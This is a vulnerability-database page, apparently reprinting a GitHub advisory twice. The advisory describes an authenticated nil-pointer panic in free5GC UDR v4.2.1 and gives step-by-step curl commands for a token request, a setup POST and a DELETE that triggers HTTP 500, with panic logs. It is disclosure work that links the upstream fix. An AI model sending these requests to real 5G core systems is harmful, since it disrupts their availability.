Severity by source
AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
Lifecycle Timeline
1DescriptionGitHub Advisory
Summary
free5GC's UDR nudr-dr DELETE /subscription-data/{ueId}/{servingPlmnId}/ee-subscriptions/{subsId}/amf-subscriptions handler contains a nil-pointer dereference reachable from a single authenticated request, after one preparatory authenticated EE-subscription create. The handler checks _, ok = UESubsData.EeSubscriptionCollection[subsId] and sets a 404 problem-details on the miss path, but then continues to UESubsData.EeSubscriptionCollection[subsId].AmfSubscriptionInfos -- dereferencing the same missing entry instead of returning. Gin recovery converts the panic into HTTP 500, but the endpoint remains repeatedly panicable.
This endpoint requires a valid nudr-dr OAuth2 access token (i.e. PR:L, NOT PR:N), so this is scored as an authenticated panic-DoS, not as an unauth-bypass finding.
Details
Validated against the UDR container in the official Docker compose lab.
- Source repo tag:
v4.2.1 - Running Docker image:
free5gc/udr:v4.2.1 - Runtime UDR commit:
754d23b0 - Docker validation date: 2026-03-22
- UDR endpoint:
http://10.100.200.11:8000
Precondition (one authenticated EE-subscription create allocates UE state):
if !ok {
udrSelf.UESubsCollection.Store(ueId, new(udr_context.UESubsData))
value, _ = udrSelf.UESubsCollection.Load(ueId)
}
...
UESubsData.EeSubscriptionCollection[newSubscriptionID] = new(udr_context.EeSubscriptionCollection)Vulnerable handler (delete on amf-subscriptions): the ok miss path sets pd but does not return, so the very next line dereferences the nil entry:
_, ok = UESubsData.EeSubscriptionCollection[subsId]
if !ok {
pd = util.ProblemDetailsNotFound("SUBSCRIPTION_NOT_FOUND")
}
if UESubsData.EeSubscriptionCollection[subsId].AmfSubscriptionInfos == nil {
pd = util.ProblemDetailsNotFound("AMFSUBSCRIPTION_NOT_FOUND")
}When subsId is absent, UESubsData.EeSubscriptionCollection[subsId] is nil, and .AmfSubscriptionInfos panics with runtime error: invalid memory address or nil pointer dereference.
Code evidence (paths in free5gc/udr):
- Precondition route + handler (EE-subscription create that allocates UE state):
NFs/udr/internal/sbi/api_datarepository.go:600NFs/udr/internal/sbi/api_datarepository.go:602NFs/udr/internal/sbi/api_datarepository.go:2528NFs/udr/internal/sbi/processor/event_exposure_subscriptions_collection.go:25NFs/udr/internal/sbi/processor/event_exposure_subscriptions_collection.go:30NFs/udr/internal/sbi/processor/event_exposure_subscriptions_collection.go:38- Vulnerable delete route + dispatch:
NFs/udr/internal/sbi/api_datarepository.go:2161NFs/udr/internal/sbi/api_datarepository.go:2172- Panic root cause (nil deref):
NFs/udr/internal/sbi/processor/event_amf_subscription_info_document.go:62NFs/udr/internal/sbi/processor/event_amf_subscription_info_document.go:64NFs/udr/internal/sbi/processor/event_amf_subscription_info_document.go:69
PoC
Reproduced end-to-end against the running UDR at http://10.100.200.11:8000.
- Restart UDR (clean state):
docker restart udr- Obtain a valid
nudr-drtoken from NRF:
curl -sS -X POST 'http://10.100.200.3:8000/oauth2/token' \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data 'grant_type=client_credentials&nfType=NEF&nfInstanceId=eb9990de-4cd3-41b0-b5d9-c2102b088c57&targetNfType=UDR&scope=nudr-dr'- Create one EE subscription to populate
UESubsCollectionforueId=x:
curl -i -sS -X POST \
'http://10.100.200.11:8000/nudr-dr/v2/subscription-data/x/context-data/ee-subscriptions' \
-H 'Authorization: Bearer <valid_nudr_dr_jwt>' \
-H 'Content-Type: application/json' \
--data '{}'HTTP/1.1 201 Created- Trigger the panic with a nonexistent
subsId:
curl -i -sS -X DELETE \
'http://10.100.200.11:8000/nudr-dr/v2/subscription-data/x/bad/ee-subscriptions/x/amf-subscriptions' \
-H 'Authorization: Bearer <valid_nudr_dr_jwt>'HTTP/1.1 500 Internal Server Error
Content-Length: 0- UDR container logs (
docker logs udr) confirm the nil-pointer panic atevent_amf_subscription_info_document.go:69insideRemoveAmfSubscriptionsInfoProcedure:
[ERRO][UDR][GIN] panic: runtime error: invalid memory address or nil pointer dereference
github.com/free5gc/udr/internal/sbi/processor.(*Processor).RemoveAmfSubscriptionsInfoProcedure
.../event_amf_subscription_info_document.go:69
github.com/free5gc/udr/internal/sbi.(*Server).HandleRemoveAmfSubscriptionsInfo
.../api_datarepository.go:2172
[INFO][UDR][GIN] | 500 | DELETE | /nudr-dr/v2/subscription-data/x/bad/ee-subscriptions/x/amf-subscriptions |Impact
NULL pointer dereference (CWE-476) in an authenticated UDR data-repository handler, caused by improper handling of the missing-subsId branch (CWE-754): the handler sets a problem-details value but does not return, then dereferences the same missing map entry.
This is NOT framed as an auth-bypass finding: the endpoint requires a valid nudr-dr OAuth2 access token. A network attacker who already holds (or can obtain) a valid token can:
- Trigger a reliable, repeatable nil-deref panic on the
amf-subscriptionsdelete route after one preparatory POST that allocates UE state for the chosenueId. - Repeat the trigger to sustain a per-request panic-DoS on UDR's data-repository surface, with each panic costing more CPU + log writes than the intended
404 SUBSCRIPTION_NOT_FOUNDresponse would have.
No Confidentiality impact (the response is 500 with empty body; no UE data is returned to the attacker via the panic). No persistent Integrity impact from the panic itself (the EE subscription created during the precondition is in-memory state owned by UDR's intended data-repository semantics, and is not corrupted by the delete-time panic). Availability impact is limited to per-request degradation (Gin recovers; the UDR process keeps running).
Affected: free5gc v4.2.1.
Upstream issue: https://github.com/free5gc/free5gc/issues/919 Upstream fix: https://github.com/free5gc/udr/pull/60
Analysis
Summary
free5GC's UDR nudr-dr DELETE /subscription-data/{ueId}/{servingPlmnId}/ee-subscriptions/{subsId}/amf-subscriptions handler contains a nil-pointer dereference reachable from a single authenticated request, after one preparatory authenticated EE-subscription create. The handler checks _, ok = UESubsData.EeSubscriptionCollection[subsId] and sets a 404 problem-details on the miss path, but then continues to UESubsData.EeSubscriptionCollection[subsId].AmfSubscriptionInfos -- dereferencing the same missing entry instead of returning. Gin recovery converts the panic into HTTP 500, but the endpoint remains repeatedly panicable.
This endpoint requires a valid nudr-dr OAuth2 access token (i.e. PR:L, NOT PR:N), so this is scored as an authenticated panic-DoS, not as an unauth-bypass finding.
Details
Validated against the UDR container in the official Docker compose lab.
- Source repo tag:
v4.2.1 - Running Docker image:
free5gc/udr:v4.2.1 - Runtime UDR commit:
754d23b0 - Docker validation date: 2026-03-22
- UDR endpoint:
http://10.100.200.11:8000
Precondition (one authenticated EE-subscription create allocates UE state):
if !ok {
udrSelf.UESubsCollection.Store(ueId, new(udr_context.UESubsData))
value, _ = udrSelf.UESubsCollection.Load(ueId)
}
...
UESubsData.EeSubscriptionCollection[newSubscriptionID] = new(udr_context.EeSubscriptionCollection)Vulnerable handler (delete on amf-subscriptions): the ok miss path sets pd but does not return, so the very next line dereferences the nil entry:
_, ok = UESubsData.EeSubscriptionCollection[subsId]
if !ok {
pd = util.ProblemDetailsNotFound("SUBSCRIPTION_NOT_FOUND")
}
if UESubsData.EeSubscriptionCollection[subsId].AmfSubscriptionInfos == nil {
pd = util.ProblemDetailsNotFound("AMFSUBSCRIPTION_NOT_FOUND")
}When subsId is absent, UESubsData.EeSubscriptionCollection[subsId] is nil, and .AmfSubscriptionInfos panics with runtime error: invalid memory address or nil pointer dereference.
Code evidence (paths in free5gc/udr):
- Precondition route + handler (EE-subscription create that allocates UE state):
NFs/udr/internal/sbi/api_datarepository.go:600NFs/udr/internal/sbi/api_datarepository.go:602NFs/udr/internal/sbi/api_datarepository.go:2528NFs/udr/internal/sbi/processor/event_exposure_subscriptions_collection.go:25NFs/udr/internal/sbi/processor/event_exposure_subscriptions_collection.go:30NFs/udr/internal/sbi/processor/event_exposure_subscriptions_collection.go:38- Vulnerable delete route + dispatch:
NFs/udr/internal/sbi/api_datarepository.go:2161NFs/udr/internal/sbi/api_datarepository.go:2172- Panic root cause (nil deref):
NFs/udr/internal/sbi/processor/event_amf_subscription_info_document.go:62NFs/udr/internal/sbi/processor/event_amf_subscription_info_document.go:64NFs/udr/internal/sbi/processor/event_amf_subscription_info_document.go:69
PoC
Reproduced end-to-end against the running UDR at http://10.100.200.11:8000.
- Restart UDR (clean state):
docker restart udr- Obtain a valid
nudr-drtoken from NRF:
curl -sS -X POST 'http://10.100.200.3:8000/oauth2/token' \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data 'grant_type=client_credentials&nfType=NEF&nfInstanceId=eb9990de-4cd3-41b0-b5d9-c2102b088c57&targetNfType=UDR&scope=nudr-dr'- Create one EE subscription to populate
UESubsCollectionforueId=x:
curl -i -sS -X POST \
'http://10.100.200.11:8000/nudr-dr/v2/subscription-data/x/context-data/ee-subscriptions' \
-H 'Authorization: Bearer <valid_nudr_dr_jwt>' \
-H 'Content-Type: application/json' \
--data '{}'HTTP/1.1 201 Created- Trigger the panic with a nonexistent
subsId:
curl -i -sS -X DELETE \
'http://10.100.200.11:8000/nudr-dr/v2/subscription-data/x/bad/ee-subscriptions/x/amf-subscriptions' \
-H 'Authorization: Bearer <valid_nudr_dr_jwt>'HTTP/1.1 500 Internal Server Error
Content-Length: 0- UDR container logs (
docker logs udr) confirm the nil-pointer panic atevent_amf_subscription_info_document.go:69insideRemoveAmfSubscriptionsInfoProcedure:
[ERRO][UDR][GIN] panic: runtime error: invalid memory address or nil pointer dereference
github.com/free5gc/udr/internal/sbi/processor.(*Processor).RemoveAmfSubscriptionsInfoProcedure
.../event_amf_subscription_info_document.go:69
github.com/free5gc/udr/internal/sbi.(*Server).HandleRemoveAmfSubscriptionsInfo
.../api_datarepository.go:2172
[INFO][UDR][GIN] | 500 | DELETE | /nudr-dr/v2/subscription-data/x/bad/ee-subscriptions/x/amf-subscriptions |Impact
NULL pointer dereference (CWE-476) in an authenticated UDR data-repository handler, caused by improper handling of the missing-subsId branch (CWE-754): the handler sets a problem-details value but does not return, then dereferences the same missing map entry.
This is NOT framed as an auth-bypass finding: the endpoint requires a valid nudr-dr OAuth2 access token. A network attacker who already holds (or can obtain) a valid token can:
- Trigger a reliable, repeatable nil-deref panic on the
amf-subscriptionsdelete route after one preparatory POST that allocates UE state for the chosenueId. - Repeat the trigger to sustain a per-request panic-DoS on UDR's data-repository surface, with each panic costing more CPU + log writes than the intended
404 SUBSCRIPTION_NOT_FOUNDresponse would have.
No Confidentiality impact (the response is 500 with empty body; no UE data is returned to the attacker via the panic). No persistent Integrity impact from the panic itself (the EE subscription created during the precondition is in-memory state owned by UDR's intended data-repository semantics, and is not corrupted by the delete-time panic). Availability impact is limited to per-request degradation (Gin recovers; the UDR process keeps running).
Affected: free5gc v4.2.1.
Upstream issue: https://github.com/free5gc/free5gc/issues/919 Upstream fix: https://github.com/free5gc/udr/pull/60
An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl
runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac
Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build
Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l
Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c
Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2
An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du
Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve
Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at
Same weakness CWE-476 – NULL Pointer Dereference
View allSame technique Denial Of Service
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-32575
GHSA-4rqf-grm6-vf75